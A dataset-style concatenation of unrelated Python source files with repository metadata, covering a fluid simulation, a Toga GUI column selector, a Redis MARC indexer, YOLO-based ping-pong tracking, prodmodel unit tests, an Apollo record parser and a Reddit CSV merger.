xl_velOffset = xl_gs*float(0.5) - newCentre
xl_velOffset = xl_velOffset * (1./ xl.timestep)
velOffset = xl_velOffset * (1./ float(scaleFactor))
#velOffset = xl_velOffset = vec3(0.0) # re-centering off
if(dim == 2):
xl_velOffset.z = velOffset.z = 0.0
# high res fluid
advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_vel, order=2, openBounds=True, boundaryWidth=bWidth)
setWallBcs(flags=xl_flags, vel=xl_vel)
addBuoyancy(density=xl_density, vel=xl_vel, gravity=buoy , flags=xl_flags)
if 1 and ( t< offset ):
vorticityConfinement( vel=xl_vel, flags=xl_flags, strength=0.05 )
solvePressure(flags=xl_flags, vel=xl_vel, pressure=xl_pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 )
setWallBcs(flags=xl_flags, vel=xl_vel)
xl_velTmp.copyFrom( xl_vel )
xl_velTmp.addConst( xl_velOffset )
if( dim == 2 ):
xl_vel.multConst( vec3(1.0,1.0,0.0) )
xl_velTmp.multConst( vec3(1.0,1.0,0.0) )
advectSemiLagrange(flags=xl_flags, vel=xl_velTmp, grid=xl_density, order=2, openBounds=True, boundaryWidth=bWidth)
xl_density.clamp(0.0, 2.0)
# low res fluid, velocity
if( t % resetN == 0) :
xl_blurvel.copyFrom( xl_vel )
# optional blurMacGrid( xl_vel, xl_blurvel, blurSig)
interpolateMACGrid( target=vel, source=xl_blurvel )
vel.multConst( vec3(1./scaleFactor) )
else:
advectSemiLagrange(flags=flags, vel=velTmp, grid=vel, order=2, openBounds=True, boundaryWidth=bWidth)
setWallBcs(flags=flags, vel=vel)
addBuoyancy(density=density, vel=vel, gravity=xl_buoy , flags=flags)
if 1 and ( t< offset ):
vorticityConfinement( vel=vel, flags=flags, strength=0.05/scaleFactor )
solvePressure(flags=flags, vel=vel, pressure=pressure , cgMaxIterFac=10.0, cgAccuracy=0.0001 )
setWallBcs(flags=flags, vel=vel)
velTmp.copyFrom(vel)
velTmp.addConst( velOffset )
# low res fluid, density
if( t % resetN == 0) :
xl_blurden.copyFrom( xl_density )
# optional blurRealGrid( xl_density, xl_blurden, blurSig)
interpolateGrid( target=density, source=xl_blurden )
else:
advectSemiLagrange(flags=flags, vel=velTmp, grid=density, order=2, openBounds=True, boundaryWidth=bWidth)
density.clamp(0.0, 2.0)
# save low and high res
# save all frames
if savedata and t>=offset and (t-offset)%interval==0:
tf = (t-offset)/interval
framePath = simPath + 'frame_%04d/' % tf
os.makedirs(framePath)
density.save(framePath + 'density_low_%04d_%04d.uni' % (simNo, tf))
vel.save(framePath + 'vel_low_%04d_%04d.uni' % (simNo, tf))
xl_density.save(framePath + 'density_high_%04d_%04d.uni' % (simNo, tf))
if(saveppm):
projectPpmFull( xl_density, simPath + 'density_high_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 )
projectPpmFull( density, simPath + 'density_low_%04d_%04d.ppm' % (simNo, tf), 0, 1.0 )
sm.step()
#gui.screenshot( 'outLibt1_%04d.png' % t )
xl.step()
t = t+1
| 35.177606 | 131 | 0.636922 |
5f8cf6b5a7d4aaf3580dd8849bfb22930268fb95 | 6,128 | py | Python | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 6 | 2020-09-26T18:31:06.000Z | 2022-02-14T14:15:02.000Z | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 44 | 2020-08-07T11:50:27.000Z | 2022-02-26T16:00:03.000Z | src/eddington_gui/boxes/data_columns_box.py | saroad2/eddington-gui | c5bbf7686c1964ca179e52348db324eeded1ee65 | [
"Apache-2.0"
] | 5 | 2020-08-10T09:41:04.000Z | 2020-10-17T10:51:23.000Z | """Box for choosing which columns to use in data dictionary."""
from typing import Callable, List, Optional
import toga
from eddington import FittingData
from toga.style import Pack
from toga.style.pack import LEFT
from eddington_gui.boxes.line_box import LineBox
from eddington_gui.util import value_or_none
class DataColumnsBox(LineBox): # pylint: disable=too-many-instance-attributes
"""Visual box instance for choosing columns."""
__items: List[str] = []
__selection_enabled: bool = False
x_selection: toga.Selection
xerr_selection: toga.Selection
y_selection: toga.Selection
yerr_selection: toga.Selection
__fitting_data: Optional[FittingData]
__on_columns_change: Optional[Callable[[FittingData], None]]
__handlers: List[Callable]
def __init__(self, on_columns_change):
"""Initialize box."""
super().__init__()
self.__fitting_data = None
self.__handlers = []
self.on_columns_change = None
self.x_selection = self.__add_column_option(
label="X column:", on_select=lambda widget: self.set_columns()
)
self.xerr_selection = self.__add_column_option(
label="X error column:", on_select=lambda widget: self.set_columns()
)
self.y_selection = self.__add_column_option(
label="Y column:", on_select=lambda widget: self.set_columns()
)
self.yerr_selection = self.__add_column_option(
label="Y error column:", on_select=lambda widget: self.set_columns()
)
self.on_columns_change = on_columns_change
@property
def fitting_data(self):
"""Fit data getter."""
return self.__fitting_data
@fitting_data.setter
def fitting_data(self, fitting_data: FittingData):
"""
Fit data setter.
If fit data is None, reset all selections
"""
self.__fitting_data = fitting_data
if fitting_data is None:
self.clear_selections()
return
items = list(fitting_data.data.keys())
used_columns = self.fitting_data.used_columns
self.set_items(self.x_selection, items, used_columns.x)
self.set_items(self.xerr_selection, items, used_columns.xerr)
self.set_items(self.y_selection, items, used_columns.y)
self.set_items(self.yerr_selection, items, used_columns.yerr)
self.selection_enabled = True
self.set_columns()
@property
def on_columns_change(self) -> Optional[Callable]:
"""on_columns_change getter."""
return self.__on_columns_change
@on_columns_change.setter
def on_columns_change(self, on_columns_change):
"""on_columns_change setter."""
self.__on_columns_change = on_columns_change
@property
def x_column(self):
"""X column name value."""
return value_or_none(self.x_selection.value)
@property
def xerr_column(self):
"""X error column name value."""
return value_or_none(self.xerr_selection.value)
@property
def y_column(self):
"""Y column name value."""
return value_or_none(self.y_selection.value)
@property
def yerr_column(self):
"""Y error column name value."""
return value_or_none(self.yerr_selection.value)
@property
def selection_enabled(self):
"""Boolean. is selection enabled for columns."""
return self.__selection_enabled
@selection_enabled.setter
def selection_enabled(self, selection_enabled):
"""Set selection enabled for all column selection widgets."""
self.__selection_enabled = selection_enabled
self.x_selection.enabled = selection_enabled
self.xerr_selection.enabled = selection_enabled
self.y_selection.enabled = selection_enabled
self.yerr_selection.enabled = selection_enabled
@staticmethod
def set_items(selection, items, value):
"""
Set items and value in selection widget.
:param selection: Selection widget
:param items: list of options for the widget
:param value: selected value
"""
selection.items = items
if value is not None:
selection.value = value
def clear_selections(self):
"""Clear all selections."""
self.selection_enabled = False
self.set_items(self.x_selection, [], None)
self.set_items(self.xerr_selection, [], None)
self.set_items(self.y_selection, [], None)
self.set_items(self.yerr_selection, [], None)
self.run_on_columns_change()
def set_columns(self): # pylint: disable=unused-argument
"""Set columns of the fit data based on the selection of the user."""
if not self.selection_enabled:
return
self.fitting_data.x_column = self.x_selection.value
self.fitting_data.xerr_column = self.xerr_selection.value
self.fitting_data.y_column = self.y_selection.value
self.fitting_data.yerr_column = self.yerr_selection.value
self.run_on_columns_change()
def run_on_columns_change(self):
"""If on_columns_change is not None, runs it."""
if self.on_columns_change is not None:
self.on_columns_change(self.fitting_data) # pylint: disable=not-callable
def read_csv(self, filepath):
"""
Read data from csv file.
:param filepath: path of the csv file
"""
self.fitting_data = FittingData.read_from_csv(filepath)
def read_excel(self, filepath, sheet):
"""
Read data from excel file.
:param filepath: path of the excel file
:param sheet: sheet from which to read the data.
"""
self.fitting_data = FittingData.read_from_excel(filepath, sheet)
def __add_column_option(self, label, on_select):
self.add(toga.Label(text=label))
selection = toga.Selection(
enabled=self.selection_enabled,
on_select=on_select,
style=Pack(alignment=LEFT),
)
self.add(selection)
return selection
| 33.67033 | 85 | 0.662369 |
23c69e7cf1ad34fbf43d12844419032bfa4856b7 | 1,345 | py | Python | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 2 | 2015-03-30T16:36:51.000Z | 2016-06-15T01:39:47.000Z | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 2 | 2021-06-10T17:43:54.000Z | 2021-12-13T19:40:08.000Z | aristotle/management/commands/load_authorities.py | jermnelson/aristotle-library-apps | f742847cd20c5b5c3b46dd53dfc395a2e1caa240 | [
"Apache-2.0"
] | 1 | 2015-11-08T00:40:11.000Z | 2015-11-08T00:40:11.000Z | """Management commands loads title, Person, and Subject authorities into
the Redis Library Services Platform"""
__author__ = "Jeremy Nelson"
import datetime
import os
import sys
from aristotle.settings import REDIS_DATASTORE, PROJECT_HOME
from django.core.management.base import BaseCommand, CommandError
def __index_titles__(**kwargs):
redis_ds = kwargs.get('redis_datastore',
REDIS_DATASTORE)
filename = kwargs.get('filename', None)
if filename is None:
return
title_authorities = pymarc.MARCReader(
open(filepath,
'rb'),
to_unicode=True)
start_time = datetime.datetime.utcnow()
print("Started title indexing at {0}".format(start_time.isoformat()))
for i, rec in enumerate(title_authorities):
index_marc(record=rec,
redis_datastore=rlsp_ds)
if not i%100:
sys.stderr.write(".")
if not i%1000:
print(i)
end_time = datetime.datetime.utcnow()
print("End title indexing at {0}, total-time={1}".format(
end_time.isoformat(),
end_time-start_time))
class Command(BaseCommand):
args = ''
help = "Indexes Title, Person, and Subject into RLSP and Whoosh indicies"
def handle(self, *args, **options):
__index_titles__(**options)
| 30.568182 | 77 | 0.649814 |
30b36cda93d35d15abd9fd441aa18c020b511148 | 5,300 | py | Python | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | client/darknet_video.py | akauble/cv-pong | eaa36222583caa7fcb4d8557ea1c9e28b92d6cec | [
"MIT"
] | null | null | null | from ctypes import *
from util import *
from GameState import *
import math
import random
import os
import cv2
import numpy as np
import time
import darknet
import argparse
def cvDrawBoxes(bestpt1, bestpt2, img):
cv2.rectangle(img, bestpt1, bestpt2, (0, 255, 0), 1)
return img
netMain = None
metaMain = None
altNames = None
player1Name = ""
player2Name = ""
maxScore = 11
tableBoundariesSet= []
# mouse callback function
def draw_boundary(event,x,y,flags,param):
if event == cv2.EVENT_LBUTTONDBLCLK:
if len(tableBoundariesSet) !=6:
tableBoundariesSet.append((x,y))
# print(tableBoundariesSet)
def YOLO():
ap = argparse.ArgumentParser()
ap = argparse.ArgumentParser()
ap.add_argument("-p1", "--player1", required=True,
help="player 1 name")
ap.add_argument("-p2", "--player2", required=True,
help="player 2 name")
ap.add_argument("-s", "--score", type=float, default=11,
help="max score (11, 21)")
ap.add_argument("-sv", "--server", required=True,
help="server name")
args = vars(ap.parse_args())
p1name = args["player1"]
p2name = args["player2"]
maxScore = args["score"]
server = args["server"]
global metaMain, netMain, altNames
configPath = "yolov3-tiny.cfg"
weightPath = "420.weights"
metaPath = "obj.data"
if not os.path.exists(configPath):
raise ValueError("Invalid config path `" +
os.path.abspath(configPath)+"`")
if not os.path.exists(weightPath):
raise ValueError("Invalid weight path `" +
os.path.abspath(weightPath)+"`")
if not os.path.exists(metaPath):
raise ValueError("Invalid data file path `" +
os.path.abspath(metaPath)+"`")
if netMain is None:
netMain = darknet.load_net_custom(configPath.encode(
"ascii"), weightPath.encode("ascii"), 0, 1) # batch size = 1
if metaMain is None:
metaMain = darknet.load_meta(metaPath.encode("ascii"))
if altNames is None:
try:
with open(metaPath) as metaFH:
metaContents = metaFH.read()
import re
match = re.search("names *= *(.*)$", metaContents,
re.IGNORECASE | re.MULTILINE)
if match:
result = match.group(1)
else:
result = None
try:
if os.path.exists(result):
with open(result) as namesFH:
namesList = namesFH.read().strip().split("\n")
altNames = [x.strip() for x in namesList]
except TypeError:
pass
except Exception:
pass
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
cap.set(cv2.CAP_PROP_SETTINGS, 1)
cv2.namedWindow('Demo')
cv2.setMouseCallback('Demo',draw_boundary)
out = cv2.VideoWriter("output.avi", cv2.VideoWriter_fourcc(*"MJPG"), 10.0, (darknet.network_width(netMain), darknet.network_height(netMain)))
print("Starting the YOLO loop...")
# Create an image we reuse for each detect
darknet_image = darknet.make_image(darknet.network_width(netMain),
darknet.network_height(netMain),3)
# setup initial boundaries
ret, frame_read = cap.read()
frame_resized = cv2.resize(frame_read,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
cv2.imshow('Demo', frame_resized)
while len(tableBoundariesSet) != 6:
cv2.waitKey(1)
state = GameState()
state.setMetaData(server, p1name, p2name)
while True:
prev_time = time.time()
ret, frame_read = cap.read()
frame_rgb = cv2.cvtColor(frame_read, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb,
(darknet.network_width(netMain),
darknet.network_height(netMain)),
interpolation=cv2.INTER_LINEAR)
darknet.copy_image_from_bytes(darknet_image,frame_resized.tobytes())
detections = darknet.detect_image(netMain, metaMain, darknet_image, thresh=0.75)
bestpt1, bestpt2 = detectionHandler(detections, frame_resized)
ballLocation = getCenterPoint(bestpt1[0], bestpt1[1], bestpt2[0], bestpt2[1])
image = cvDrawBoxes(bestpt1, bestpt2, frame_resized)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# if isBallOnTable(ballLocation) and col_det(ballLocation):
# state.addBounce()
# cv2.circle(image,ballLocation, 12, (0,0,255), -1)
if isBallOnTable(ballLocation):
addBallLocation(ballLocation, image)
#get ball side
tableSide = getTableSide(ballLocation)
if tableSide != "":
if state.side != tableSide:
#it changed side
didBounce = colDetection2()
if didBounce:
print("it bounced")
else:
print("no bounce detected")
resetLocations()
state.updateSide(tableSide)
scoreP1, scoreP2 = state.tick()
if state.getHighestScore() == maxScore:
state.endGame()
break;
#draw ball side
tableBoundaryHandler(image, tableBoundariesSet)
if tableSide == "left":
cv2.putText(image, tableSide, (200, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
else:
cv2.putText(image, tableSide, (375, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
cv2.putText(image, str(player1Name) + " " + str(scoreP1), (100, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
cv2.putText(image, str(player2Name) + " " + str(scoreP2), (300, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255))
out.write(image)
cv2.imshow('Demo', image)
if cv2.waitKey(20) & 0xFF == 27:
break
# cv2.waitKey(3)
cap.release()
out.release()
if __name__ == "__main__":
YOLO() | 29.120879 | 142 | 0.695849 |
64fdd7b34275285ced47e7072f8b134d5a3f0eae | 1,968 | py | Python | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 53 | 2019-04-28T03:50:05.000Z | 2022-02-04T21:52:51.000Z | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 17 | 2019-04-25T01:46:46.000Z | 2019-07-15T02:58:02.000Z | tests/prodmodel/rules/test_rules.py | prodmodel/prodmodel | 83aad9a2e3f07b182a8e90ea0d92580cb2e949fe | [
"Apache-2.0"
] | 3 | 2019-06-20T07:47:23.000Z | 2021-09-06T07:21:51.000Z | import unittest
from prodmodel.rules import rules as undertest
class TestRules(unittest.TestCase):
def test_data_stream(self):
target = undertest.data_stream(file='/home/abc/x.json', data_type='json')
self.assertEqual('JSONDataTarget', target.__class__.__name__)
def test_data_file(self):
target = undertest.data_file(file='/home/abc/x.dat')
self.assertEqual('BinaryDataTarget', target.__class__.__name__)
def _data_stream(self):
return undertest.data_stream(file='/home/abc/x.json', data_type='json')
def test_split(self):
train_x, train_y, test_x, test_y = undertest.split(data=self._data_stream(), test_ratio=0.5, target_column='x')
self.assertEqual('SelectDataTarget', train_x.__class__.__name__)
self.assertEqual('SelectDataTarget', train_y.__class__.__name__)
self.assertEqual('SelectDataTarget', test_x.__class__.__name__)
self.assertEqual('SelectDataTarget', test_y.__class__.__name__)
def test_transform_stream(self):
target = undertest.transform_stream(file='/home/abc/x.py', fn='tf', stream=self._data_stream())
self.assertEqual('TransformStreamDataTarget', target.__class__.__name__)
def test_transform(self):
target = undertest.transform(file='/home/abc/x.py', fn='tf', streams={'s': self._data_stream()})
self.assertEqual('TransformDataTarget', target.__class__.__name__)
def test_create_label_encoder(self):
target = undertest.create_label_encoder(data=self._data_stream(), columns=['x'])
self.assertEqual('LabelEncoderTarget', target.__class__.__name__)
def test_encode_labels(self):
le = undertest.create_label_encoder(data=self._data_stream(), columns=['x'])
target = undertest.encode_labels(data=self._data_stream(), label_encoder=le)
self.assertEqual('EncodeLabelDataTarget', target.__class__.__name__)
def test_test(self):
target = undertest.test(test_file='/home/abc/x.py')
self.assertEqual('TestTarget', target.__class__.__name__)
| 42.782609 | 115 | 0.756098 |
49d9f2646838cfb3998ada2a7ce98d0655b008ee | 4,546 | py | Python | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | modules/tools/record_parse_save/record_parse_save.py | GaoPenghao/apollo | c80ff99a1478b1709f434639fe29a2b2f43ad516 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""
function to parse data from *.record files, created using Apollo-Auto
current implementation illustrates sample record file parsing for
* radar (Continental ars-408)
* camera (Leopard Imaging 6mm)
* lidar (Velodyne vls-128)
* saves extracted images in separate folder using *.jpg format
* saves radar and lidar data in respective folders in *.txt format for each scan
* also saves timestamp in separate text files
"""
import os
import sys
import time
from importlib import import_module
import yaml
from cyber.python.cyber_py3 import cyber
from cyber.python.cyber_py3 import record
os.system('clear')
def read_parameters(yaml_file):
"""
function to read YAML parameter file and define output destinations
"""
with open(yaml_file, 'r') as f:
params = yaml.safe_load(f)
# record file params
RECORD_FOLDER = params['records']['filepath']
parse_type = params['parse']
# define destinations
dest_path = os.path.split(RECORD_FOLDER)
if not dest_path[-1]:
dest_path = os.path.split(dest_path[0])
OUT_FOLDER = dest_path[0] + '/'
temp_path = os.path.split(dest_path[0])
FOLDER_PREFIX = temp_path[1].replace("-", "")
parse_dict = {"params": params,
"parse_type": parse_type,
"out_folder": OUT_FOLDER,
"prefix": FOLDER_PREFIX,
"record_folder": RECORD_FOLDER}
return parse_dict
def define_destinations(parse_dict):
"""
define destination for extracted files
"""
dest_dict = {
"channel_name": "",
"timestamp_file": "",
"destination_folder": ""
}
parse_type = parse_dict["parse_type"]
params = parse_dict["params"]
dest_folder = parse_dict["out_folder"]
prefix = parse_dict["prefix"]
# 选择解析函数,比如 parse_planning
parser_func = 'parse_' + parse_type
dest_dict['channel_name'] = params[parse_type]['channel_name']
dest_dict['timestamp_file'] = dest_folder + prefix + params[parse_type]['timestamp_file_extn']
dest_dict['destination_folder'] = dest_folder + \
prefix + params[parse_type]['out_folder_extn'] + '/'
if not os.path.exists(dest_dict["destination_folder"]):
os.makedirs(dest_dict["destination_folder"])
return dest_dict, parser_func
def parse_apollo_record(parse_dict, dest_dict, parser_func):
"""
"""
record_folder_path = parse_dict["record_folder"]
parse_type = parse_dict["parse_type"]
record_files = sorted(os.listdir(parse_dict["record_folder"]))
parse_timestamp = []
parse_mod = import_module(parser_func)
print("=" * 60)
print('--------- Parsing data for: ' + parse_type + ' ---------')
for rfile in record_files:
print("=" * 60)
print("parsing record file: %s" % rfile)
freader = record.RecordReader(record_folder_path + rfile)
time.sleep(.025)
for channelname, msg, datatype, timestamp in freader.read_messages():
if channelname == dest_dict["channel_name"]:
tstamp = parse_mod.parse_data(channelname, msg, dest_dict['destination_folder'])
parse_timestamp.append(tstamp)
# write radar-timestamp files
with open(dest_dict["timestamp_file"], 'w+') as f:
for item in parse_timestamp:
f.write("%s\n" % item)
print("=" * 60)
print('DONE: records parsed and data saved to: \n ' + dest_dict['destination_folder'])
print("=" * 60)
if __name__ == '__main__':
cyber.init()
parse_dict = read_parameters('modules/tools/record_parse_save/parser_params.yaml')
dest_dict, parser_func = define_destinations(parse_dict)
parse_apollo_record(parse_dict, dest_dict, parser_func)
cyber.shutdown()
| 32.471429 | 98 | 0.653982 |
4ca5e38670aec6fdcba92a603f6fd320a36d7318 | 3,815 | py | Python | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 44 | 2017-09-29T00:53:44.000Z | 2020-12-20T13:43:49.000Z | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 39 | 2017-09-29T10:26:10.000Z | 2019-05-02T21:07:59.000Z | tgt_grease/core/InversionOfControl.py | jairamd22/grease | 7ebf3df71d5c80a8ed9df44d9b64b735a9d0f899 | [
"MIT"
] | 26 | 2017-09-28T18:00:39.000Z | 2021-10-17T15:14:39.000Z | from tgt_grease.core import Logging
from tgt_grease.core.Connectivity import Mongo
from datetime import datetime
from bson.objectid import ObjectId
import platform
import os
class GreaseContainer(object):
"""Inversion of Control Container for objects in GREASE"""
def __init__(self, *args, **kwargs):
if args or kwargs:
self.getLogger().warning(
"Passing instances of Logger to the IOC is deprecated. Please just use getLogger().", verbose=True
)
self.__logger = None
self.__mongo = None
def getLogger(self):
"""Get the logging instance
Returns:
Logging: The logging instance
"""
if not isinstance(self.__logger, Logging):
self.__logger = Logging()
return self.__logger
def getNotification(self):
"""Get the notifications instance
Returns:
tgt_grease.core.Notifications: The notifications instance
"""
return self.getLogger().getNotification()
def getMongo(self):
"""Get the Mongo instance
Returns:
Mongo: Mongo Instance Connection
"""
if not isinstance(self.__mongo, Mongo):
self.__mongo = Mongo(self.getLogger().getConfig())
return self.__mongo
def getCollection(self, collectionName):
"""Get a collection object from MongoDB
Args:
collectionName (str): Collection to get
Returns:
pymongo.collection.Collection: Collection instance
"""
return self.getMongo()\
.Client()\
.get_database(self.getConfig().get('Connectivity', 'MongoDB').get('db', 'grease'))\
.get_collection(collectionName)
def getConfig(self):
"""Gets the Configuration Instance
Returns:
tgt_grease.core.Configuration.Configuration: the configuration instance
"""
return self.getLogger().getConfig()
def ensureRegistration(self):
"""
:return:
"""
collection = self.getCollection("JobServer")
if os.path.isfile(self.getConfig().greaseDir + 'grease.identity'):
# check to see if identity file is valid
fil = open(self.getConfig().greaseDir + 'grease.identity', 'r')
nodeId = "".join(fil.read())
fil.close()
server = collection.find_one({'_id': ObjectId(nodeId)})
if server:
# Valid registration
self.getConfig().NodeIdentity = nodeId
return True
else:
self.getLogger().warning("Invalid node identity found to exist!")
if self.getConfig().NodeIdentity == "Unknown":
# Actual registration
uid = collection.insert_one({
'jobs': 0,
'os': platform.system().lower(),
'roles': ["general"],
'prototypes': ["monitor"],
'active': True,
'activationTime': datetime.utcnow()
}).inserted_id
fil = open(self.getConfig().greaseDir + "grease.identity", "w")
fil.write(str(uid))
fil.close()
self.getConfig().NodeIdentity = uid
del collection
return True
else:
# Check the Identity is actually registered
if collection.find({'_id': ObjectId(self.getConfig().NodeIdentity)}).count():
del collection
return True
else:
self.getLogger().error("Invalid Node Identity::Node Identity Not Found", additional={
'NodeID': self.getConfig().NodeIdentity
})
del collection
return False
| 30.766129 | 114 | 0.563827 |
da84f821a2169001f5abe07ac1fe6d44bed0dd29 | 2,489 | py | Python | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | py34env/Scripts/explode.py | EKiefer/edge-starter | cc1bbac3fb7191b16eeca03b2a596d232b4ece7f | [
"MIT"
] | null | null | null | #!c:\users\ekiefer\projects\django\my_edge\py34env\scripts\python.exe
#
# The Python Imaging Library
# $Id$
#
# split an animation into a number of frame files
#
from __future__ import print_function
from PIL import Image
import os
import sys
class Interval(object):
def __init__(self, interval="0"):
self.setinterval(interval)
def setinterval(self, interval):
self.hilo = []
for s in interval.split(","):
if not s.strip():
continue
try:
v = int(s)
if v < 0:
lo, hi = 0, -v
else:
lo = hi = v
except ValueError:
i = s.find("-")
lo, hi = int(s[:i]), int(s[i+1:])
self.hilo.append((hi, lo))
if not self.hilo:
self.hilo = [(sys.maxsize, 0)]
def __getitem__(self, index):
for hi, lo in self.hilo:
if hi >= index >= lo:
return 1
return 0
# --------------------------------------------------------------------
# main program
html = 0
if sys.argv[1:2] == ["-h"]:
html = 1
del sys.argv[1]
if not sys.argv[2:]:
print()
print("Syntax: python explode.py infile template [range]")
print()
print("The template argument is used to construct the names of the")
print("individual frame files. The frames are numbered file001.ext,")
print("file002.ext, etc. You can insert %d to control the placement")
print("and syntax of the frame number.")
print()
print("The optional range argument specifies which frames to extract.")
print("You can give one or more ranges like 1-10, 5, -15 etc. If")
print("omitted, all frames are extracted.")
sys.exit(1)
infile = sys.argv[1]
outfile = sys.argv[2]
frames = Interval(",".join(sys.argv[3:]))
try:
# check if outfile contains a placeholder
outfile % 1
except TypeError:
file, ext = os.path.splitext(outfile)
outfile = file + "%03d" + ext
ix = 1
im = Image.open(infile)
if html:
file, ext = os.path.splitext(outfile)
html = open(file+".html", "w")
html.write("<html>\n<body>\n")
while True:
if frames[ix]:
im.save(outfile % ix)
print(outfile % ix)
if html:
html.write("<img src='%s'><br>\n" % outfile % ix)
try:
im.seek(ix)
except EOFError:
break
ix += 1
if html:
html.write("</body>\n</html>\n")
| 22.026549 | 75 | 0.541985 |
46d4ac9d6ba9a35229d0b6a5ff3743e6824f5b81 | 629 | py | Python | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | null | null | null | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | null | null | null | code/merge_reddit.py | xjohnwu/dorahacktradegeneration | a6b2fa0dbe631bae028d0d6e70663d129a37cdbc | [
"MIT"
] | 1 | 2018-10-20T12:34:24.000Z | 2018-10-20T12:34:24.000Z | import pandas as pd
import numpy as np
path = 'C:/dorahacktradegeneration/data'
full_data = None
files = ['bitcoin_201709.csv', 'bitcoin_201710.csv', 'bitcoin_201711.csv', 'bitcoin_201801.csv', 'bitcoin_201802.csv',
'bitcoin_201803.csv', 'bitcoin_201804.csv', 'bitcoin_201805.csv', 'bitcoin_201806.csv', 'bitcoin_201807.csv',
'bitcoin_201808.csv', 'bitcoin_201809.csv', 'bitcoin_201810.csv']
for file in files:
data = pd.read_csv(path + """/""" + file)
if full_data is None:
full_data = data
else:
full_data.append(data, ignore_index=True)
full_data.to_csv('reddit_all.csv')
| 31.45 | 119 | 0.691574 |